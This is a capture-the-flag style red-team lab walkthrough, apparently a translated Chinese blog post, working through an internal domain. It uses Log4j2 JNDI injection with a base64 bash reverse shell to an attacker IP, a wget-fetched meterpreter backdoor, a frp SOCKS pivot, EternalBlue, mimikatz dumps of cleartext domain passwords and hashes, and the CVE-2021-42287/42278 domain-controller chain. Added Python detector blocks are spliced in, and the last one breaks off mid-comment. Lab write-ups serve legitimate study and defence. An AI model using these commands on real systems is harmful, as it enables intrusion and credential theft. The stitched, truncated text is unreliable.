Internal Network Lab | 渗透攻击红队 (Penetration Attack Red Team) Internal Domain Penetration Lab 2

admin, 2024-03-27 22:29:54

This lab is simpler than the previous one. It dates from 2021, when Log4j2 RCE and CVE-2021-42287 & CVE-2021-42278 were still fairly new vulnerabilities, so it is a good opportunity to work through how these classic vulnerabilities are exploited. This article is for study and reference only; experts, please go easy. The lab comes from the WeChat public account 渗透攻击红队.

Disclaimer: this article only records and summarises a personal learning process. Do not use the techniques described here for illegal testing; the author and this public account bear no responsibility for any adverse consequences arising from such use.

01

Environment Overview

  • Attacker:
    • Kali Linux: 172.20.4.153

  • Targets:
    • Ubuntu 16: 172.20.4.146, 10.0.1.6
    • Windows 7: 10.0.1.7, 10.0.0.7
    • Windows Server 2012: 10.0.0.12

02

External Foothold

Information Gathering

Scan 172.20.4.146 with the 御剑 high-speed TCP port scanner

The target has ports 22 and 38080 open.

Port 22 is the SSH service.

Open port 38080 in a browser.

From the site's icon this looks like a Spring Boot application, so CVE-2021-44228 is worth testing.

CVE-2021-44228 Log4j2 RCE

Generate a subdomain at http://dnslog.cn/

Visit http://172.20.4.146:38080/hello, capture the request, and submit the following via POST:

payload=${jndi:ldap://io1ctr.dnslog.cn/test}

Or use curl:

curl 172.20.4.146:38080/hello -X POST -d 'payload=${jndi:ldap://io1ctr.dnslog.cn/test}'

If a record shows up in DNSLog, CVE-2021-44228 is present.

Exploitation:

On Kali, start the HTTP and LDAP services with JNDIExploit-2.0-SNAPSHOT.jar

java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 172.20.4.16
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...

Listen on local port 2222

nc -lvnp 2222

Generate the reverse shell command online at https://forum.ywhack.com/shell.php

bash -i >& /dev/tcp/172.20.4.153/2222 0>&1

Base64-encode the reverse shell command

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx

Replay the request in Burp Suite, POSTing the reverse shell payload

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

Kali did not receive a shell. Checking the LDAP listener shows that the payload was not decoded correctly.

The + sign was interpreted as a space, so replace + with its double URL encoding:

%252b
# %25 is the URL encoding of %
# %2b is the URL encoding of +

The final payload is

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

Send the request

The LDAP listener we set up also shows the intended command being executed

The shell was successfully sent back to port 2222
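The encoding detour above is exactly what a detection rule for this request has to cope with: a filter that form-decodes once turns a raw + into a space, and one that decodes only once still sees %2b rather than +. The following Python is an added example, not code from the article or from the lab's author. It normalises a request body the way the application stack does (one form decode, then repeated percent-decoding until the text is stable), flags any ${jndi:...} lookup, and for the /Base64/ path form used above decodes the embedded command so an analyst can see what was attempted. The three sample bodies are constructed from the article's own payloads; the names normalise and inspect_body are mine.

```python
import base64
import re
from typing import Optional
from urllib.parse import unquote, unquote_plus

# A JNDI lookup as it appears once the request body has been decoded.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:\s}]+)"
    r"(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)


def normalise(body: str, max_rounds: int = 5) -> str:
    """Decode a request body the way the application stack does: one form
    decode (which also turns '+' into a space), then plain percent-decoding
    until the text stops changing, so that %252b and %2b both end up as '+'."""
    text = unquote_plus(body)
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect_body(body: str) -> Optional[dict]:
    """Return a finding for a JNDI lookup in the body, or None if there is none."""
    match = JNDI_RE.search(normalise(body))
    if match is None:
        return None
    finding = {
        "scheme": match["scheme"].lower(),
        "host": match["host"],
        "port": int(match["port"]) if match["port"] else None,
        "path": match["path"],
        "command": None,
    }
    marker = "/Base64/"
    if marker in finding["path"]:
        segment = finding["path"].split(marker, 1)[1]
        try:
            finding["command"] = base64.b64decode(segment, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            # Not valid base64 - this is what happens when a raw '+' inside the
            # encoded command has been turned into a space by form decoding.
            finding["command"] = None
    return finding


# Constructed samples reproducing the three request bodies from the article.
SAMPLES = {
    "dnslog probe": "payload=${jndi:ldap://io1ctr.dnslog.cn/test}",
    "raw plus (broken)": "payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/"
                         "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}",
    "double-encoded plus": "payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/"
                           "YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, "->", inspect_body(body))
```

The detector deliberately does not stop at the first decode: the attacker's second layer of encoding is meant to survive the framework's form decoding, so a rule that inspects the raw body or a single decode pass would still match here, but it would miss the same payload if the whole lookup were percent-encoded. Decoding until stable, then matching, removes that dependency.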

Trying ifconfig to look at the network configuration shows that the command does not exist

We are probably inside a Docker container.

Check whether a .dockerenv file exists in the root directory

ls / -a

Check /proc/self/cgroup

cat /proc/self/cgroup

It is now fairly certain that we are in a Docker environment.

Check whether the container was started in privileged mode

root@cc4ddedd1727:/demo# cat /proc/self/status |grep Cap
cat /proc/self/status |grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

If the container had been started in privileged mode, the CapEff mask would be 0000003fffffffff. It clearly is not, so a container escape via privileged mode is not possible here.
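Reading CapEff by eye only tells you whether it equals the full mask. The Python below is an added example, not code from the article or from the lab's author; it is the check a defender auditing a container's runtime profile would run: parse the Cap* lines from /proc/self/status, decode the effective mask into capability names, and report both whether it is the full privileged set and which individually high-risk capabilities are present. The capability bit numbers come from the kernel's capability.h, the sample status text is constructed from the values shown above, and the high-risk list, the function names and the HIGH_RISK set are my own choices.

```python
import re

# Linux capability names indexed by bit number (from <linux/capability.h>).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
]

# CapEff value the article gives for a --privileged container: bits 0..37 all set.
PRIVILEGED_MASK = 0x0000003FFFFFFFFF

# Capabilities that container hardening baselines treat as high risk on their own
# (my selection, not an official list).
HIGH_RISK = {"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_PTRACE",
             "CAP_SYS_RAWIO", "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN"}


def parse_cap_lines(status_text: str) -> dict:
    """Extract the Cap* fields of /proc/<pid>/status as integers."""
    caps = {}
    for line in status_text.splitlines():
        m = re.match(r"^(Cap\w+):\s*([0-9a-fA-F]{1,16})$", line.strip())
        if m:
            caps[m.group(1)] = int(m.group(2), 16)
    return caps


def decode_caps(mask: int) -> list:
    """Turn a capability bitmask into the list of capability names it grants."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def assess(status_text: str) -> dict:
    """Summarise the effective capability set of the process the status text belongs to."""
    caps = parse_cap_lines(status_text)
    eff = caps.get("CapEff", 0)
    names = decode_caps(eff)
    return {
        "cap_eff": f"{eff:016x}",
        "capabilities": names,
        "privileged": eff == PRIVILEGED_MASK,
        "high_risk": sorted(HIGH_RISK & set(names)),
    }


# Constructed sample built from the values shown in the article.
SAMPLE_STATUS = """\
Name:\tbash
CapInh:\t00000000a80425fb
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""

if __name__ == "__main__":
    result = assess(SAMPLE_STATUS)
    print("CapEff:", result["cap_eff"], "privileged:", result["privileged"])
    print("granted:", ", ".join(result["capabilities"]))
    print("high risk:", result["high_risk"] or "none")
```

Run against a real container, replace SAMPLE_STATUS with the contents of /proc/self/status. The mask a80425fb decodes to the 14 capabilities of Docker's default set, none of them in the high-risk list, which is why the article rules out the privileged-mode escape. One caveat the equality check does not cover: kernels from 5.8 onward added CAP_PERFMON, CAP_BPF and CAP_CHECKPOINT_RESTORE (bits 38 to 40), so on those kernels a privileged container shows CapEff 000001ffffffffff rather than 0000003fffffffff; comparing the decoded set against the names rather than the raw number avoids that trap.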

Check the command history

history

There is a flag.txt under /root/.

View /root/flag.txt

That gives the first flag: flag{redteam.lab-1}

It also gives an account and password: saul:Saul123

Try logging in to the target over SSH

Check the network configuration of the current machine

saul@ubantu:~$ ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:73ff:fe04:9380  prefixlen 64  scopeid 0x20<link>
        ether 02:42:73:04:93:80  txqueuelen 0  (以太网)
        RX packets 1261  bytes 209556 (209.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1115  bytes 579027 (579.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.4.146  netmask 255.255.252.0  broadcast 172.20.7.255
        inet6 fe80::ef82:7216:f2f7:4513  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8b:87:63  txqueuelen 1000  (以太网)
        RX packets 379040  bytes 26105962 (26.1 MB)
        RX errors 0  dropped 3  overruns 0  frame 0
        TX packets 147717  bytes 9097485 (9.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.1.6  netmask 255.255.255.255  broadcast 10.0.1.6
        inet6 fe80::aaea:89b9:79db:6b9c  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:8b:87:6d  txqueuelen 1000  (以太网)
        RX packets 442  bytes 35349 (35.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 70  bytes 7746 (7.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (本地环回)
        RX packets 483  bytes 58742 (58.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 483  bytes 58742 (58.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth94a6d8d: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::249c:25ff:fe0f:7adf  prefixlen 64  scopeid 0x20<link>
        ether 26:9c:25:0f:7a:df  txqueuelen 0  (以太网)
        RX packets 1261  bytes 227210 (227.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1154  bytes 583247 (583.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

There is a network interface with IP 10.0.1.6.

Check whether the current user has sudo rights

sudo -l
# or
grep -Po '^sudo.+:\K.*$' /etc/group

03

Internal Network Penetration

Internal Information Gathering

Use ping in a for loop to find live hosts on the internal network

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

There is another host, 10.0.1.7, on the 10.0.1.x segment.

To make the rest of the engagement easier, bring the current machine into MSF.

Generate a Linux backdoor on Kali

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.20.4.153  LPORT=1111 -f elf > 1111.elf

Start an HTTP server with Python

python3 -m http.server 80

Download the backdoor on the pivot host with wget

wget http://172.20.4.153/1111.elf

Make 1111.elf executable

chmod +x 1111.elf

Set up the MSF listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.20.4.153
msf6 exploit(multi/handler) > set lport 1111
msf6 exploit(multi/handler) > run

Run 1111.elf as root on the pivot host

sudo ./1111.elf

MSF receives the session

Upload frpc and frpc.ini

frpc.ini configuration

[common]
server_addr = 172.20.4.153
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 1080
plugin = socks5

Run on Kali

frps -c frps.ini

frps.ini configuration

[common]
bind_addr = 0.0.0.0
bind_port = 7000

In the target's shell, run

frpc -c frpc.ini

On Kali the proxy connection is reported as successful

Set the MSF global proxy

msf6 > setg Proxies socks5:172.20.4.153:1080
msf6 > setg ReverseAllowProxy true

Scan 10.0.1.7 with nmap through the proxy

proxychains4 nmap -v -Pn -T3 -sV -n -sT --open 10.0.1.7
......
Nmap scan report for 10.0.1.7
Host is up (0.0054s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: REDTEAM)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
......

Use MSF's smb_version module to fingerprint 10.0.1.7

meterpreter > background
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set rhost 10.0.1.7
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 20
msf6 auxiliary(scanner/smb/smb_version) > run

The classic Windows 7 Ultimate SP1, so EternalBlue is worth testing.

EternalBlue

Use the ms17_010_eternalblue module

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.1.7
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 2222
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 10.0.1.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.1.7:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.1.7:445          - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.1.7:445 - The target is vulnerable.
[*] 10.0.1.7:445 - Connecting to target for exploitation.
[+] 10.0.1.7:445 - Connection established for exploitation.
[+] 10.0.1.7:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.1.7:445 - CORE raw buffer dump (38 bytes)
[*] 10.0.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.0.1.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 10.0.1.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 10.0.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.1.7:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.1.7:445 - Sending all but last fragment of exploit packet
[*] 10.0.1.7:445 - Starting non-paged pool grooming
[+] 10.0.1.7:445 - Sending SMBv2 buffers
[+] 10.0.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.1.7:445 - Sending final SMBv2 buffers.
[*] 10.0.1.7:445 - Sending last fragment of exploit packet!
[*] 10.0.1.7:445 - Receiving response from exploit packet
[+] 10.0.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.1.7:445 - Sending egg to corrupted connection.
[*] 10.0.1.7:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.0.1.7:2222
[*] Sending stage (201798 bytes) to 10.0.1.7
[*] Meterpreter session 2 opened (172.20.4.153:36881 -> 172.20.4.153:1080) at 2024-03-26 21:41:40 +0800
[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN7
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : REDTEAM
Logged On Users : 3
Meterpreter     : x64/windows

We have SYSTEM on WIN7.

Get the flag on the desktop

meterpreter > shell
Process 3068 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>type C:\Users\root\Desktop\flag.txt
type C:\Users\root\Desktop\flag.txt
flag{redteam.lab-2}

Check the network configuration

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7
   Primary Dns Suffix  . . . . . . . : redteam.lab
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : redteam.lab

Ethernet adapter 本地连接 2:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-41-6F-CB
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::8892:5d29:728e:423d%13(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.0.0.7(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44
   DNS Servers . . . . . . . . . . . : 10.0.0.12
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-41-6F-C1
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::9ce9:b7fa:afb2:f8ab%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.0.1.7(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44
   DNS Servers . . . . . . . . . . . : 10.0.1.7
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{88DB6121-0924-4160-B2C6-608488C461A8}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{8D95A122-4FF1-4BCD-B20F-F04CD81A7E1E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

The machine is in the redteam.lab domain and has a second interface with IP 10.0.0.7.

Try dumping credentials

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain   LM                                NTLM                              SHA1
--------  ------   --                                ----                              ----
WIN7$     REDTEAM                                    ac9018bcd329a8f4c85026b33d5bafa0  d7658d331b07b9a1da6cd48a833e37d925cf4029
hong      win7     aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709
root      REDTEAM  f772a42242b3f72c9c5014ae4718a7ee  41ed68671702fa84d38084b5d60cc33d  361dc644072bfbda76ae5690919f65bb6b36e0d8

wdigest credentials
===================

Username  Domain   Password
--------  ------   --------
(null)    (null)   (null)
WIN7$     REDTEAM  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b 7c 65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 57 d1 9c 60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76 1a 2b 73 17 8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc 4e a8 5f 20 ce ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3
hong      win7     (null)
root      REDTEAM  Red12345

tspkg credentials
=================

Username  Domain   Password
--------  ------   --------
hong      win7     (null)
root      REDTEAM  Red12345

kerberos credentials
====================

Username  Domain       Password
--------  ------       --------
(null)    (null)       (null)
hong      win7         (null)
root      REDTEAM.LAB  Red12345
win7$     REDTEAM.LAB  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b 7c 65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 57 d1 9c 60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76 1a 2b 73 17 8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc 4e a8 5f 20 ce ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3

This yields the cleartext password of the domain user redteam\root: Red12345

Upload fscan and scan 10.0.0.0/24

meterpreter > upload fscan.exe
[*] Uploading  : /root/桌面/fscan.exe -> fscan.exe
[*] Uploaded 5.18 MiB of 5.18 MiB (100.0%): /root/桌面/fscan.exe -> fscan.exe
[*] Completed  : /root/桌面/fscan.exe -> fscan.exe
meterpreter > shell
Process 3016 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>fscan.exe -h 10.0.0.0/24
fscan.exe -h 10.0.0.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.0.0.7        is alive
(icmp) Target 10.0.0.12       is alive
[*] Icmp alive hosts len is: 2
10.0.0.7:139 open
10.0.0.7:135 open
10.0.0.12:88 open
10.0.0.12:445 open
10.0.0.7:445 open
10.0.0.12:139 open
10.0.0.12:135 open
[*] alive ports len is: 7
start vulscan
[+] 10.0.0.7    MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)
[+] NetInfo:
[*]10.0.0.7
   [->]win7
   [->]10.0.1.7
   [->]10.0.0.7
[+] NetInfo:
[*]10.0.0.12
   [->]DC
   [->]10.0.0.12
[*] 10.0.0.7             __MSBROWSE__\WIN7              Windows 7 Ultimate 7601 Service Pack 1
[+] 10.0.0.12   MS17-010        (Windows Server 2012 R2 Datacenter 9600)
[*] 10.0.0.12      [+]DC REDTEAM\DC                Windows Server 2012 R2 Datacenter 9600
已完成 7/7
[*] 扫描结束,耗时: 9.0503873s

On the 10.0.0.x segment there is only the domain controller DC, 10.0.0.12, running Windows Server 2012 R2.

Taking the DC with CVE-2021-42287 & CVE-2021-42278

Reference: 只需要一个域用户即可拿到 DC 权限 (Only one domain user is needed to obtain DC privileges: CVE-2021-42287 and CVE-2021-42278)

  • CVE-2021-42278: a machine account name should normally end with $, but AD did not validate the names of machine accounts in the domain.

  • CVE-2021-42287: used together with the above. Create a machine account with the same name as the DC's machine account (without the trailing $), request a TGT for it, then rename the account and request a TGS ticket via S4U2self. In the TGS_REP stage, because that account no longer exists, the DC encrypts the TGS ticket with its own key and supplies a PAC belonging to that account, which yields a high-privilege ST.
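Every step of that chain leaves a trace in the domain controller's Security log, which is what a defender would watch for rather than the Kerberos traffic itself. The Python below is an added example, not code from the article or from the sam-the-admin project: it runs a simple heuristic over parsed Security events, flagging a computer account created without the $ suffix (event ID 4741, "A computer account was created") and a sAMAccountName change that drops or adds the $ (event ID 4781, "The name of an account was changed"), escalating to critical when the $-less name collides with a domain controller's account. The event IDs are the real Windows ones; the flat record layout, the DC_ACCOUNTS set and the sample events (built from the tool output shown further down, where SAMTHEADMIN-34$ is renamed to dc and back) are constructed for this example. It generalises slightly beyond the article by also catching the reverse rename and any $-less creation, not just the DC-name collision.

```python
# Heuristic detection of sAMAccountName spoofing (CVE-2021-42278) from parsed
# Windows Security events. Event IDs are real (4741 = computer account created,
# 4781 = account name changed); the flat dict layout below is a simplified,
# constructed stand-in for the fields a SIEM would extract from the event XML.

DC_ACCOUNTS = {"DC$"}  # assumed: machine accounts of the domain's DCs, upper-case


def _finding(event, severity, reason):
    return {"event_id": event["id"], "subject": event["subject"],
            "severity": severity, "reason": reason}


def check_event(event, dc_accounts=DC_ACCOUNTS):
    """Return a finding dict for a suspicious event, or None for a benign one."""
    if event["id"] == 4741:
        name = event["target"]
        if not name.endswith("$"):
            return _finding(event, "high",
                            f"computer account {name!r} created without the '$' suffix")
        return None
    if event["id"] == 4781:
        old, new = event["old"], event["new"]
        # A legitimate computer rename keeps the '$' on both sides; the exploit
        # chain drops it on the way in and restores it on the way out.
        if old.endswith("$") == new.endswith("$"):
            return None
        bare = new if not new.endswith("$") else old
        if (bare.upper() + "$") in dc_accounts:
            return _finding(event, "critical",
                            f"sAMAccountName {old!r} -> {new!r} collides with DC account {bare.upper()}$")
        return _finding(event, "medium",
                        f"sAMAccountName {old!r} -> {new!r} lost or gained the '$' suffix")
    return None


def scan_events(events, dc_accounts=DC_ACCOUNTS):
    """Run check_event over a batch of events and keep only the findings."""
    return [f for f in (check_event(e, dc_accounts) for e in events) if f is not None]


# Constructed sample mirroring what the exploit tool did in this lab, plus one
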